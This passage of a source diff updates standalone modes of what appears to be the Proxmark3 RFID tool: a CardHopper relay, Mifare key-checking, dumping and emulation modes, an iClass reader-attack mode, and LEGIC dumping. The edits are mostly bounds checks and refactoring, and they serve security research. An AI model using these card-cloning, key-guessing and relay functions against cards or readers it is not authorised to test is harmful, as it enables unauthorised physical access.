+        if (AT91C_BASE_PDC_SSC->PDC_RCR == 0) {
             AT91C_BASE_PDC_SSC->PDC_RPR = (uint32_t)dmaBuf;
             AT91C_BASE_PDC_SSC->PDC_RCR = DMA_BUFFER_SIZE;
             // Dbprintf("[-] RxEmpty ERROR | data length %d", dataLen); // temporary
         }
         // secondary buffer sets as primary, secondary buffer was stopped
-        if (!AT91C_BASE_PDC_SSC->PDC_RNCR) {
+        if (AT91C_BASE_PDC_SSC->PDC_RNCR == 0) {
             AT91C_BASE_PDC_SSC->PDC_RNPR = (uint32_t)dmaBuf;
             AT91C_BASE_PDC_SSC->PDC_RNCR = DMA_BUFFER_SIZE;
         }

armsrc/Standalone/hf_cardhopper.c

@@ -33,7 +33,10 @@
 #ifdef CARDHOPPER_USB
 #define cardhopper_write usb_write
 #define cardhopper_read usb_read_ng
-#define cardhopper_data_available usb_poll_validate_length
+bool cardhopper_data_available(void);
+bool cardhopper_data_available(void) {
+    return usb_read_ng_has_buffered_data() || usb_poll_validate_length();
+}
 #else
 #define cardhopper_write usart_writebuffer_sync
 #define cardhopper_read usart_read_ng
@@ -56,7 +59,7 @@ static const uint8_t magicCARD[4] = "CARD";
 static const uint8_t magicEND [4] = "\xff" "END";
 static const uint8_t magicRSRT[7] = "RESTART";
 static const uint8_t magicERR [4] = "\xff" "ERR";
-static       uint8_t magicACK [1] = "\xfe"; // is constant, but must be passed to API that doesn't like that
+static const uint8_t magicACK [1] = "\xfe";
 
 // Forward declarations
 static void become_reader(void);
@@ -69,7 +72,7 @@ static bool try_use_canned_response(const uint8_t *, int, tag_response_info_t *)
 static void reply_with_packet(packet_t *);
 
 static void read_packet(packet_t *);
-static void write_packet(packet_t *);
+static void write_packet(const packet_t *);
 
 static bool GetIso14443aCommandFromReaderInterruptible(uint8_t *, uint16_t, uint8_t *, int *);
 
@@ -107,14 +110,22 @@ void RunMod(void) {
             break;
         }
 
-        if (memcmp(magicREAD, modeRx.dat, sizeof(magicREAD)) == 0) {
+        if (modeRx.len == 0) {
+            DbpString(_CYAN_("[@]") " Zero length message");
+            continue;
+        }
+
+        if (modeRx.len == sizeof(magicREAD) && memcmp(magicREAD, modeRx.dat, sizeof(magicREAD)) == 0) {
             DbpString(_CYAN_("[@]") " I am a READER. I talk to a CARD.");
             become_reader();
-        } else if (memcmp(magicCARD, modeRx.dat, sizeof(magicCARD)) == 0) {
+        } else if (modeRx.len == sizeof(magicCARD) && memcmp(magicCARD, modeRx.dat, sizeof(magicCARD)) == 0) {
             DbpString(_CYAN_("[@]") " I am a CARD. I talk to a READER.");
             become_card();
-        } else if (memcmp(magicEND, modeRx.dat, sizeof(magicEND)) == 0) {
+        } else if (modeRx.len == sizeof(magicEND) && memcmp(magicEND, modeRx.dat, sizeof(magicEND)) == 0) {
             break;
+        } else if (modeRx.len == sizeof(magicRSRT) && memcmp(magicRSRT, modeRx.dat, sizeof(magicRSRT)) == 0) {
+            DbpString(_CYAN_("[@]") " Got RESET but already reset.");
+            continue;
         } else {
             DbpString(_YELLOW_("[!]") " unknown mode!");
             Dbhexdump(modeRx.len, modeRx.dat, true);
@@ -135,14 +146,19 @@ static void become_reader(void) {
     packet_t packet = { 0 };
     packet_t *rx = &packet;
     packet_t *tx = &packet;
-    uint8_t toCard[256] = { 0 };
+    uint8_t toCard[MAX_FRAME_SIZE] = { 0 };
     uint8_t parity[MAX_PARITY_SIZE] = { 0 };
 
     while (1) {
         WDT_HIT();
 
         read_packet(rx);
-        if (memcmp(magicRSRT, rx->dat, sizeof(magicRSRT)) == 0) break;
+        if (rx->len == sizeof(magicRSRT) && memcmp(magicRSRT, rx->dat, sizeof(magicRSRT)) == 0) break;
+
+        if (BUTTON_PRESS()) {
+            DbpString(_CYAN_("[@]") " Button pressed - Breaking from reader loop");
+            break;
+        }
 
         if (rx->dat[0] == ISO14443A_CMD_RATS && rx->len == 4) {
             // got RATS from reader, reset the card
@@ -162,11 +178,15 @@ static void become_reader(void) {
         AddCrc14A(toCard, rx->len);
         ReaderTransmit(toCard, rx->len + 2, NULL);
 
-        tx->len = ReaderReceive(tx->dat, sizeof(tx->dat), parity);
-        if (tx->len == 0) {
+        // read to toCard instead of tx->dat directly to allow the extra byte for the CRC
+        uint16_t fromCardLen = ReaderReceive(toCard, sizeof(toCard), parity);
+        if (fromCardLen <= 2) {
             tx->len = sizeof(magicERR);
             memcpy(tx->dat, magicERR, sizeof(magicERR));
-        } else tx->len -= 2; // cut off the CRC
+        } else {
+            tx->len = fromCardLen - 2; // cut off the CRC
+            memcpy(tx->dat, toCard, tx->len);
+        }
 
         write_packet(tx);
     }
@@ -206,21 +226,22 @@ static void become_card(void) {
     iso14443a_setup(FPGA_HF_ISO14443A_TAGSIM_LISTEN);
 
     uint8_t tagType;
-    uint16_t flags;
+    uint16_t flags = 0;
     uint8_t data[PM3_CMD_DATA_SIZE] = { 0 };
     packet_t ats = { 0 };
     prepare_emulation(&tagType, &flags, data, &ats);
 
     tag_response_info_t *canned;
     uint32_t cuid;
-    uint32_t counters[3] = { 0 };
-    uint8_t tearings[3] = { 0xbd, 0xbd, 0xbd };
     uint8_t pages;
-    SimulateIso14443aInit(tagType, flags, data, &canned, &cuid, counters, tearings, &pages);
+    if (SimulateIso14443aInit(tagType, flags, data, NULL, 0, &canned, &cuid, &pages, NULL) == false) {
+        DbpString(_RED_("Error initializing the emulation process!"));
+        return;
+    }
 
     DbpString(_CYAN_("[@]") " Setup done - entering emulation loop");
     int fromReaderLen;
-    uint8_t fromReaderDat[256] = { 0 };
+    uint8_t fromReaderDat[MAX_FRAME_SIZE] = { 0 };
     uint8_t parity[MAX_PARITY_SIZE] = { 0 };
     packet_t packet = { 0 };
     packet_t *tx = &packet;
@@ -261,8 +282,14 @@ static void become_card(void) {
         memcpy(tx->dat, fromReaderDat, tx->len);
         write_packet(tx);
 
+        if (no_reply) {
+            // since the RATS reply has already been sent waiting here will can result in missing the next reader command
+            // if we do get a reply later on while waiting for the next reader message it will be safely ignored
+            continue;
+        }
+
         read_packet(rx);
-        if (!no_reply && rx->len > 0) {
+        if (rx->len > 0) {
             reply_with_packet(rx);
         }
     }
@@ -297,7 +324,7 @@ static void prepare_emulation(uint8_t *tagType, uint16_t *flags, uint8_t *data,
     }
 
     memcpy(data, uidRx.dat, uidRx.len);
-    *flags = (uidRx.len == 10 ? FLAG_10B_UID_IN_DATA : (uidRx.len == 7 ? FLAG_7B_UID_IN_DATA : FLAG_4B_UID_IN_DATA));
+    FLAG_SET_UID_IN_DATA(*flags, uidRx.len);
     DbpString(_CYAN_("[@]") " UID:");
     Dbhexdump(uidRx.len, data, false);
     Dbprintf(_CYAN_("[@]") " Flags: %hu", *flags);
@@ -328,7 +355,13 @@ static void cook_ats(packet_t *ats, uint8_t fwi, uint8_t sfgi) {
 
         uint8_t orig_t0 = ats->dat[1];
         // Update FSCI in T0 from the received ATS
-        t0 |= orig_t0 & 0x0F;
+        uint8_t fsci = orig_t0 & 0x0F;
+        if (fsci > 8) {
+            // our packet length maxes out at 255 bytes, an FSCI of 8 requires 256 bytes
+            // but since we drop the 2 byte CRC16 we're safe capping this at 8
+            fsci = 8;
+        }
+        t0 |= fsci;
 
         uint8_t len = ats->len - 2;
         uint8_t *orig_ats_ptr = &ats->dat[2];
@@ -433,20 +466,12 @@ static bool try_use_canned_response(const uint8_t *dat, int len, tag_response_in
 }
 
 
-static uint8_t g_responseBuffer  [512 ] = { 0 };
-static uint8_t g_modulationBuffer[1024] = { 0 };
+static uint8_t g_responseBuffer  [MAX_FRAME_SIZE] = { 0 };
 
 static void reply_with_packet(packet_t *packet) {
-    tag_response_info_t response = { 0 };
-    response.response = g_responseBuffer;
-    response.modulation = g_modulationBuffer;
-
-    memcpy(response.response, packet->dat, packet->len);
-    AddCrc14A(response.response, packet->len);
-    response.response_n = packet->len + 2;
-
-    prepare_tag_modulation(&response, sizeof(g_modulationBuffer));
-    EmSendPrecompiledCmd(&response);
+    memcpy(g_responseBuffer, packet->dat, packet->len);
+    AddCrc14A(g_responseBuffer, packet->len);
+    EmSendCmd(g_responseBuffer, packet->len + 2);
 }
 
 
@@ -476,23 +501,31 @@ static void read_packet(packet_t *packet) {
 
         if (packet->len == 0x50 && dataReceived >= sizeof(PacketResponseNGPreamble) && packet->dat[0] == 0x4D && packet->dat[1] == 0x33 && packet->dat[2] == 0x61) {
             // PM3 NG packet magic
-            DbpString(_CYAN_("[@]") " PM3 NG packet recieved - ignoring");
+            DbpString(_CYAN_("[@]") " PM3 NG packet received - ignoring");
 
             // clear any remaining buffered data
             while (cardhopper_data_available()) {
-                cardhopper_read(packet->dat, 255);
+                cardhopper_read(packet->dat, sizeof(packet->dat));
             }
 
             packet->len = 0;
             return;
         }
     }
-    cardhopper_write(magicACK, sizeof(magicACK));
+
+    if (packet->len > (MAX_FRAME_SIZE - 2)) {
+        // this will overrun MAX_FRAME_SIZE once we re-add the CRC
+        // in theory this should never happen but better to be defensive
+        packet->len = 0;
+        cardhopper_write(magicERR, sizeof(magicERR));
+    } else {
+        cardhopper_write(magicACK, sizeof(magicACK));
+    }
 }
 
 
-static void write_packet(packet_t *packet) {
-    cardhopper_write((uint8_t *) packet, packet->len + 1);
+static void write_packet(const packet_t *packet) {
+    cardhopper_write((const uint8_t *) packet, packet->len + 1);
 }
 
 

armsrc/Standalone/hf_colin.c

@@ -95,6 +95,11 @@ static iso14a_card_select_t colin_p_card;
 static int colin_currline;
 static int colin_currfline;
 static int colin_curlline;
+static int cjat91_saMifareChkKeys(uint8_t blockNo, uint8_t keyType, bool clearTrace, uint8_t keyCount, const uint8_t *datain, uint64_t *key);
+static int e_MifareECardLoad(uint32_t numofsectors, uint8_t keytype);
+static void saMifareMakeTag(void);
+static int saMifareCSetBlock(uint32_t arg0, uint32_t arg1, uint32_t arg2, const uint8_t *datain);
+static void WriteTagToFlash(uint32_t uid, size_t size);
 
 // TODO : Implement fast read of KEYS like in RFIdea
 // also http://ext.delaat.net/rp/2015-2016/p04/report.pdf
@@ -245,7 +250,7 @@ static char *ReadSchemasFromSPIFFS(char *filename) {
 
     int changed = rdv40_spiffs_lazy_mount();
     uint32_t size = size_in_spiffs((char *)filename);
-    uint8_t *mem = BigBuf_malloc(size);
+    uint8_t *mem = BigBuf_calloc(size);
     rdv40_spiffs_read_as_filetype((char *)filename, (uint8_t *)mem, size, RDV40_SPIFFS_SAFETY_SAFE);
 
     if (changed) {
@@ -257,7 +262,7 @@ static char *ReadSchemasFromSPIFFS(char *filename) {
 
 static void add_schemas_from_json_in_spiffs(char *filename) {
 
-    char *jsonfile = ReadSchemasFromSPIFFS((char *)filename);
+    const char *jsonfile = ReadSchemasFromSPIFFS((char *)filename);
 
     int i, len = strlen(jsonfile);
     struct json_token t;
@@ -287,7 +292,7 @@ static void ReadLastTagFromFlash(void) {
     DbprintfEx(FLAG_NEWLINE, "Button HELD ! Using LAST Known TAG for Simulation...");
     cjSetCursLeft();
 
-    uint8_t *mem = BigBuf_malloc(size);
+    uint8_t *mem = BigBuf_calloc(size);
 
     // this one will handle filetype (symlink or not) and resolving by itself
     rdv40_spiffs_read_as_filetype((char *)HFCOLIN_LASTTAG_SYMLINK, (uint8_t *)mem, len, RDV40_SPIFFS_SAFETY_SAFE);
@@ -301,7 +306,7 @@ static void ReadLastTagFromFlash(void) {
     return;
 }
 
-void WriteTagToFlash(uint32_t uid, size_t size) {
+static void WriteTagToFlash(uint32_t uid, size_t size) {
     SpinOff(0);
     LED_A_ON();
     LED_B_ON();
@@ -311,7 +316,7 @@ void WriteTagToFlash(uint32_t uid, size_t size) {
     uint32_t len = size;
     uint8_t data[(size * (16 * 64)) / 1024];
 
-    emlGetMem(data, 0, (size * 64) / 1024);
+    emlGetMem_xt(data, 0, (size * 64) / 1024, MIFARE_BLOCK_SIZE);
 
     char dest[SPIFFS_OBJ_NAME_LEN];
     uint8_t buid[4];
@@ -440,11 +445,11 @@ void RunMod(void) {
     };
 
     // Can remember something like that in case of Bigbuf
-    keyBlock = BigBuf_malloc(ARRAYLEN(mfKeys) * 6);
+    keyBlock = BigBuf_calloc(ARRAYLEN(mfKeys) * MF_KEY_LENGTH);
     int mfKeysCnt = ARRAYLEN(mfKeys);
 
     for (int mfKeyCounter = 0; mfKeyCounter < mfKeysCnt; mfKeyCounter++) {
-        num_to_bytes(mfKeys[mfKeyCounter], 6, (uint8_t *)(keyBlock + mfKeyCounter * 6));
+        num_to_bytes(mfKeys[mfKeyCounter], MF_KEY_LENGTH, (uint8_t *)(keyBlock + (mfKeyCounter * MF_KEY_LENGTH)));
     }
 
     // TODO : remember why we actually had need to initialize this array in such specific case
@@ -493,7 +498,7 @@ failtag:
     SpinOff(50);
     LED_A_ON();
 
-    while (!iso14443a_select_card(colin_cjuid, &colin_p_card, &colin_cjcuid, true, 0, true)) {
+    while (iso14443a_select_card(colin_cjuid, &colin_p_card, &colin_cjcuid, true, 0, true) == 0) {
         WDT_HIT();
         if (BUTTON_HELD(10) == BUTTON_HOLD) {
             WDT_HIT();
@@ -646,7 +651,7 @@ failtag:
     emlClearMem();
     uint8_t mblock[16];
     for (uint8_t sectorNo = 0; sectorNo < sectorsCnt; sectorNo++) {
-        emlGetMem(mblock, FirstBlockOfSector(sectorNo) + NumBlocksPerSector(sectorNo) - 1, 1);
+        emlGetMem_xt(mblock, FirstBlockOfSector(sectorNo) + NumBlocksPerSector(sectorNo) - 1, 1, MIFARE_BLOCK_SIZE);
         for (uint8_t t = 0; t < 2; t++) {
             memcpy(mblock + t * 10, foundKey[t][sectorNo], 6);
         }
@@ -717,33 +722,10 @@ readysim:
     SpinOff(100);
     LED_C_ON();
 
-    /*
     uint16_t flags = 0;
-    switch (colin_p_card.uidlen) {
-        case 10:
-            flags = FLAG_10B_UID_IN_DATA;
-            break;
-        case 7:
-            flags = FLAG_7B_UID_IN_DATA;
-            break;
-        case 4:
-            flags = FLAG_4B_UID_IN_DATA;
-            break;
-        default:
-            flags = FLAG_UID_IN_EMUL;
-            break;
-    }
-    // Use UID, SAK, ATQA from EMUL, if uid not defined
-    if ((flags & (FLAG_4B_UID_IN_DATA | FLAG_7B_UID_IN_DATA | FLAG_10B_UID_IN_DATA)) == 0) {
-       flags |= FLAG_UID_IN_EMUL;
-    }
-    flags |= FLAG_MF_1K;
-    if ((flags & (FLAG_4B_UID_IN_DATA | FLAG_7B_UID_IN_DATA | FLAG_10B_UID_IN_DATA)) == 0) {
-        flags |= FLAG_UID_IN_EMUL;
-     }
-    flags = 0x10;
-    */
-    uint16_t flags = FLAG_UID_IN_EMUL;
+//    FLAG_SET_UID_IN_DATA(flags, colin_p_card.uidlen);
+    FLAG_SET_UID_IN_EMUL(flags);
+    FLAG_SET_MF_SIZE(flags, MIFARE_1K_MAX_BYTES);
     DbprintfEx(FLAG_NEWLINE, "\n\n\n\n\n\n\n\nn\n\nn\n\n\nflags: %d (0x%02x)", flags, flags);
     cjSetCursLeft();
     SpinOff(1000);
@@ -786,7 +768,7 @@ readysim:
  * - *datain used as error return
  * - tracing is falsed
  */
-int e_MifareECardLoad(uint32_t numofsectors, uint8_t keytype) {
+static int e_MifareECardLoad(uint32_t numofsectors, uint8_t keytype) {
     uint8_t numSectors = numofsectors;
     uint8_t keyType = keytype;
 
@@ -803,7 +785,7 @@ int e_MifareECardLoad(uint32_t numofsectors, uint8_t keytype) {
 
     bool isOK = true;
 
-    if (!iso14443a_select_card(colin_cjuid, &colin_p_card, &colin_cjcuid, true, 0, true)) {
+    if (iso14443a_select_card(colin_cjuid, &colin_p_card, &colin_cjcuid, true, 0, true) == 0) {
         isOK = false;
     }
 
@@ -830,7 +812,7 @@ int e_MifareECardLoad(uint32_t numofsectors, uint8_t keytype) {
                     emlSetMem_xt(dataoutbuf, FirstBlockOfSector(s) + blockNo, 1, 16);
                 } else {
                     // sector trailer, keep the keys, set only the AC
-                    emlGetMem(dataoutbuf2, FirstBlockOfSector(s) + blockNo, 1);
+                    emlGetMem_xt(dataoutbuf2, FirstBlockOfSector(s) + blockNo, 1, MIFARE_BLOCK_SIZE);
                     memcpy(&dataoutbuf2[6], &dataoutbuf[6], 4);
                     emlSetMem_xt(dataoutbuf2, FirstBlockOfSector(s) + blockNo, 1, 16);
                 }
@@ -848,8 +830,8 @@ int e_MifareECardLoad(uint32_t numofsectors, uint8_t keytype) {
 
 /* the chk function is a piwi'ed(tm) check that will try all keys for
 a particular sector. also no tracing no dbg */
-int cjat91_saMifareChkKeys(uint8_t blockNo, uint8_t keyType, bool clearTrace,
-                           uint8_t keyCount, uint8_t *datain, uint64_t *key) {
+static int cjat91_saMifareChkKeys(uint8_t blockNo, uint8_t keyType, bool clearTrace,
+                                  uint8_t keyCount, const uint8_t *datain, uint64_t *key) {
     iso14443a_setup(FPGA_HF_ISO14443A_READER_LISTEN);
     set_tracing(false);
 
@@ -862,8 +844,7 @@ int cjat91_saMifareChkKeys(uint8_t blockNo, uint8_t keyType, bool clearTrace,
     for (uint8_t i = 0; i < keyCount; i++) {
 
         /* no need for anticollision. just verify tag is still here */
-        // if (!iso14443a_fast_select_card(colin_cjuid, 0)) {
-        if (!iso14443a_select_card(colin_cjuid, &colin_p_card, &colin_cjcuid, true, 0, true)) {
+        if (iso14443a_select_card(colin_cjuid, &colin_p_card, &colin_cjcuid, true, 0, true) == 0) {
             cjSetCursLeft();
             DbprintfEx(FLAG_NEWLINE, "%sFATAL%s : E_MF_LOSTTAG", _XRED_, _XWHITE_);
             break;
@@ -886,7 +867,7 @@ int cjat91_saMifareChkKeys(uint8_t blockNo, uint8_t keyType, bool clearTrace,
     return retval;
 }
 
-void saMifareMakeTag(void) {
+static void saMifareMakeTag(void) {
     uint8_t cfail = 0;
     cjSetCursLeft();
     cjTabulize();
@@ -901,7 +882,7 @@ void saMifareMakeTag(void) {
     int flags = 0;
     for (int blockNum = 0; blockNum < 16 * 4; blockNum++) {
         uint8_t mblock[16];
-        emlGetMem(mblock, blockNum, 1);
+        emlGetMem_xt(mblock, blockNum, 1, MIFARE_BLOCK_SIZE);
         // switch on field and send magic sequence
         if (blockNum == 0)
             flags = 0x08 + 0x02;
@@ -946,7 +927,7 @@ void saMifareMakeTag(void) {
 // Matt's StandAlone mod.
 // Work with "magic Chinese" card (email him: ouyangweidaxian@live.cn)
 //-----------------------------------------------------------------------------
-int saMifareCSetBlock(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain) {
+static int saMifareCSetBlock(uint32_t arg0, uint32_t arg1, uint32_t arg2, const uint8_t *datain) {
     // params
     uint8_t needWipe = arg0;
     // bit 0 - need get UID
@@ -981,7 +962,7 @@ int saMifareCSetBlock(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *data
 
         // get UID from chip
         if (workFlags & 0x01) {
-            if (!iso14443a_select_card(colin_cjuid, &colin_p_card, &colin_cjcuid, true, 0, true)) {
+            if (iso14443a_select_card(colin_cjuid, &colin_p_card, &colin_cjcuid, true, 0, true) == 0) {
                 DbprintfEx(FLAG_NEWLINE, "Can't select card");
                 break;
             };

armsrc/Standalone/hf_colin.h

@@ -35,12 +35,6 @@
 #define _XWHITE_ "\x1b[0m"
 #define _XORANGE_ _XYELLOW_
 
-int cjat91_saMifareChkKeys(uint8_t blockNo, uint8_t keyType, bool clearTrace, uint8_t keyCount, uint8_t *datain, uint64_t *key);
-int e_MifareECardLoad(uint32_t numofsectors, uint8_t keytype);
-void saMifareMakeTag(void);
-int saMifareCSetBlock(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain);
-void WriteTagToFlash(uint32_t uid, size_t size);
-
 const char clearTerm[8] = {0x1b, 0x5b, 0x48, 0x1b, 0x5b, 0x32, 0x4a, '\0'};
 
 //void cjPrintBigArray(const char *bigar, int len, uint8_t newlines, uint8_t debug);

armsrc/Standalone/hf_craftbyte.c

@@ -79,13 +79,8 @@ void RunMod(void) {
                 }
             } else if (state == STATE_EMUL) {
                 uint16_t flags = 0;
-                if (card.uidlen == 4) {
-                    flags |= FLAG_4B_UID_IN_DATA;
-                } else if (card.uidlen == 7) {
-                    flags |= FLAG_7B_UID_IN_DATA;
-                } else if (card.uidlen == 10) {
-                    flags |= FLAG_10B_UID_IN_DATA;
-                } else {
+                FLAG_SET_UID_IN_DATA(flags, card.uidlen);
+                if (IS_FLAG_UID_IN_EMUL(flags)) {
                     Dbprintf("Unusual UID length, something is wrong. Try again please.");
                     state = STATE_READ;
                     continue;
@@ -94,22 +89,22 @@ void RunMod(void) {
                 Dbprintf("Starting simulation, press " _GREEN_("pm3 button") " to stop and go back to search state.");
                 if (card.sak == 0x08 && card.atqa[0] == 0x04 && card.atqa[1] == 0) {
                     DbpString("Mifare Classic 1k");
-                    SimulateIso14443aTag(1, flags, card.uid, 0);
+                    SimulateIso14443aTag(1, flags, card.uid, 0, NULL, 0, false, false);
                 } else if (card.sak == 0x08 && card.atqa[0] == 0x44 && card.atqa[1] == 0) {
                     DbpString("Mifare Classic 4k ");
-                    SimulateIso14443aTag(8, flags, card.uid, 0);
+                    SimulateIso14443aTag(8, flags, card.uid, 0, NULL, 0, false, false);
                 } else if (card.sak == 0x00 && card.atqa[0] == 0x44 && card.atqa[1] == 0) {
                     DbpString("Mifare Ultralight");
-                    SimulateIso14443aTag(2, flags, card.uid, 0);
+                    SimulateIso14443aTag(2, flags, card.uid, 0, NULL, 0, false, false);
                 } else if (card.sak == 0x20 && card.atqa[0] == 0x04 && card.atqa[1] == 0x03) {
                     DbpString("Mifare DESFire");
-                    SimulateIso14443aTag(3, flags, card.uid, 0);
+                    SimulateIso14443aTag(3, flags, card.uid, 0, NULL, 0, false, false);
                 } else if (card.sak == 0x20 && card.atqa[0] == 0x44 && card.atqa[1] == 0x03) {
                     DbpString("Mifare DESFire Ev1/Plus/JCOP");
-                    SimulateIso14443aTag(3, flags, card.uid, 0);
+                    SimulateIso14443aTag(3, flags, card.uid, 0, NULL, 0, false, false);
                 } else {
                     Dbprintf("Unrecognized tag type -- defaulting to Mifare Classic emulation");
-                    SimulateIso14443aTag(1, flags, card.uid, 0);
+                    SimulateIso14443aTag(1, flags, card.uid, 0, NULL, 0, false, false);
                 }
 
                 // Go back to search state if user presses pm3-button

armsrc/Standalone/hf_iceclass.c

@@ -238,7 +238,7 @@ static int reader_attack_mode(void) {
 
     BigBuf_free();
     uint16_t mac_response_len = 0;
-    uint8_t *mac_responses = BigBuf_malloc(MAC_RESPONSES_SIZE);
+    uint8_t *mac_responses = BigBuf_calloc(MAC_RESPONSES_SIZE);
 
     iclass_simulate(ICLASS_SIM_MODE_READER_ATTACK, NUM_CSNS, false, csns, mac_responses, &mac_response_len);
 
@@ -250,9 +250,9 @@ static int reader_attack_mode(void) {
 
         size_t dumplen = NUM_CSNS * 24;
 
-        uint8_t *dump = BigBuf_malloc(dumplen);
+        uint8_t *dump = BigBuf_calloc(dumplen);
         if (dump == false) {
-            Dbprintf("failed to allocate memory");
+            Dbprintf("Failed to allocate memory");
             return PM3_EMALLOC;
         }
 
@@ -305,6 +305,7 @@ static int reader_dump_mode(void) {
         BigBuf_free();
 
         uint8_t *card_data = BigBuf_malloc(ICLASS_16KS_SIZE);
+        // Don't use calloc since we set allocated memory to 0xFF's
         memset(card_data, 0xFF, ICLASS_16KS_SIZE);
 
         if (BUTTON_PRESS()) {
@@ -442,6 +443,7 @@ static int dump_sim_mode(void) {
         BigBuf_free();
 
         uint8_t *card_data = BigBuf_malloc(ICLASS_16KS_SIZE);
+        // Don't use calloc since we set allocated memory to 0xFF's
         memset(card_data, 0xFF, ICLASS_16KS_SIZE);
 
         if (BUTTON_PRESS()) {

armsrc/Standalone/hf_legic.c

@@ -69,16 +69,18 @@ static void save_dump_to_file(legic_card_select_t *p_card) {
     // legic functions puts it memory in Emulator reserved memory.
     uint8_t *mem = BigBuf_get_EM_addr();
 
-    char *preferredName = (char *)BigBuf_malloc(30);
+    char *preferredName = (char *)BigBuf_calloc(30);
     if (preferredName == NULL) {
+        if (g_dbglevel >= DBG_DEBUG) Dbprintf("Failed to allocate memory");
         goto OUT;
     }
 
     sprintf(preferredName, "hf-legic-%02X%02X%02X%02X-dump", p_card->uid[0], p_card->uid[1], p_card->uid[2], p_card->uid[3]);
     uint16_t preferredNameLen = strlen(preferredName);
 
-    char *filename = (char *)BigBuf_malloc(preferredNameLen + 4 + 1 + 10);
+    char *filename = (char *)BigBuf_calloc(preferredNameLen + 4 + 1 + 10);
     if (filename == NULL) {
+        if (g_dbglevel >= DBG_DEBUG) Dbprintf("Failed to allocate memory");
         goto OUT;
     }
 

armsrc/Standalone/hf_mattyrun.c

@@ -33,6 +33,7 @@
 #include "mifaresim.h"  // mifare1ksim
 #include "mifareutil.h"
 #include "proxmark3_arm.h"
+#include "spiffs.h"
 #include "standalone.h" // standalone definitions
 #include "string.h"
 #include "ticks.h"
@@ -246,7 +247,7 @@ void RunMod(void) {
     // usb_disable();
 
     // Allocate dictionary buffer
-    uint64_t *const mfcKeys = (uint64_t *)BigBuf_malloc(
+    uint64_t *const mfcKeys = (uint64_t *)BigBuf_calloc(
                                   sizeof(uint64_t) * (ARRAYLEN(MATTYRUN_MFC_ESSENTIAL_KEYS) +
                                                       ARRAYLEN(MATTYRUN_MFC_DEFAULT_KEYS) +
                                                       MIFARE_4K_MAXSECTOR * 2));
@@ -500,7 +501,7 @@ void RunMod(void) {
             uint8_t mblock[MIFARE_BLOCK_SIZE];
             for (uint8_t sectorNo = 0; sectorNo < sectorsCnt; ++sectorNo) {
                 if (validKey[0][sectorNo] || validKey[1][sectorNo]) {
-                    emlGetMem(mblock, FirstBlockOfSector(sectorNo) + NumBlocksPerSector(sectorNo) - 1, 1);
+                    emlGetMem_xt(mblock, FirstBlockOfSector(sectorNo) + NumBlocksPerSector(sectorNo) - 1, 1, MIFARE_BLOCK_SIZE);
                     for (uint8_t keyType = 0; keyType < 2; ++keyType) {
                         if (validKey[keyType][sectorNo]) {
                             memcpy(mblock + keyType * 10, foundKey[keyType][sectorNo], 6);
@@ -520,11 +521,11 @@ void RunMod(void) {
             int filled;
             partialEmulation = false;
             DbpString("[=] Filling emulator memory using key A");
-            filled = MifareECardLoad(sectorsCnt, MF_KEY_A);
+            filled = MifareECardLoad(sectorsCnt, MF_KEY_A, NULL);
             if (filled != PM3_SUCCESS) {
                 DbpString("[" _YELLOW_("-") "] " _YELLOW_("Only partially filled using key A, retry with key B!"));
                 DbpString("[=] Filling emulator memory using key B");
-                filled = MifareECardLoad(sectorsCnt, MF_KEY_B);
+                filled = MifareECardLoad(sectorsCnt, MF_KEY_B, NULL);
                 if (filled != PM3_SUCCESS) {
                     DbpString("[" _YELLOW_("-") "] " _YELLOW_("Only partially filled using key B!"));
                 }
@@ -534,7 +535,14 @@ void RunMod(void) {
                 SpinErr(LED_D, 50, 8);
                 partialEmulation = true;
             } else {
-                DbpString("[" _GREEN_("+") "] " _GREEN_("Emulator memory filled completely."));
+#ifdef WITH_FLASH
+                DbpString("[" _GREEN_("+") "] " _GREEN_("Emulator memory filled completely. Start storing card in spiff memory."));
+                uint8_t *emCARD = BigBuf_get_EM_addr();
+                char dumpFileName[30] = {0};
+                sprintf(dumpFileName, DUMP_FILE, mattyrun_card.uid[0], mattyrun_card.uid[1], mattyrun_card.uid[2], mattyrun_card.uid[3]);
+                rdv40_spiffs_write(dumpFileName, emCARD, 1024, RDV40_SPIFFS_SAFETY_SAFE);
+                Dbprintf("[" _GREEN_("+") "] " _GREEN_("Stored card on %s"), dumpFileName);
+#endif
             }
 
             state = STATE_EMULATE;
@@ -556,19 +564,7 @@ void RunMod(void) {
             }
 
             uint16_t simflags = 0;
-            switch (mattyrun_card.uidlen) {
-                case 4:
-                    simflags |= FLAG_4B_UID_IN_DATA;
-                    break;
-                case 7:
-                    simflags |= FLAG_7B_UID_IN_DATA;
-                    break;
-                case 10:
-                    simflags |= FLAG_10B_UID_IN_DATA;
-                    break;
-                default:
-                    break;
-            }
+            FLAG_SET_UID_IN_DATA(simflags, mattyrun_card.uidlen);
             uint16_t atqa = (uint16_t)bytes_to_num(mattyrun_card.atqa, 2);
 
             SpinDelay(1000);

armsrc/Standalone/hf_mattyrun.h

@@ -21,6 +21,9 @@
 
 #include <inttypes.h>
 
+// Filename to store the card info in spiff memory
+#define DUMP_FILE "hf_mattyrun_dump_%02x%02x%02x%02x.bin"
+
 // Set of standard keys to be used
 static uint64_t const MATTYRUN_MFC_DEFAULT_KEYS[] = {
     0xFFFFFFFFFFFF,  // Default key

armsrc/Standalone/hf_mfcsim.c

@@ -143,7 +143,9 @@ void RunMod(void) {
 
         //Start to simulate
         Dbprintf(_YELLOW_("[Slot: %d] Simulation start, Press button to change next card."), i);
-        uint16_t simflags = FLAG_UID_IN_EMUL | FLAG_MF_1K;
+        uint16_t simflags = 0;
+        FLAG_SET_MF_SIZE(simflags, MIFARE_1K_MAX_BYTES);
+        FLAG_SET_UID_IN_EMUL(simflags);
         Mifare1ksim(simflags, 0, NULL, 0, 0);
         Dbprintf(_YELLOW_("[Slot: %d] Simulation end, Write Back to dump file!"), i);
 

armsrc/Standalone/hf_msdsal.c

@@ -209,7 +209,8 @@ void RunMod(void) {
     bool chktoken = false;
 
     // UID 4 bytes(could be 7 bytes if needed it)
-    uint8_t flags = FLAG_4B_UID_IN_DATA;
+    uint8_t flags = 0;
+    FLAG_SET_UID_IN_DATA(flags, 4);
     // in case there is a read command received we shouldn't break
     uint8_t data[PM3_CMD_DATA_SIZE] = {0x00};
 
@@ -378,7 +379,7 @@ void RunMod(void) {
             BigBuf_free_keep_EM();
 
             // tag type: 11 = ISO/IEC 14443-4 - javacard (JCOP)
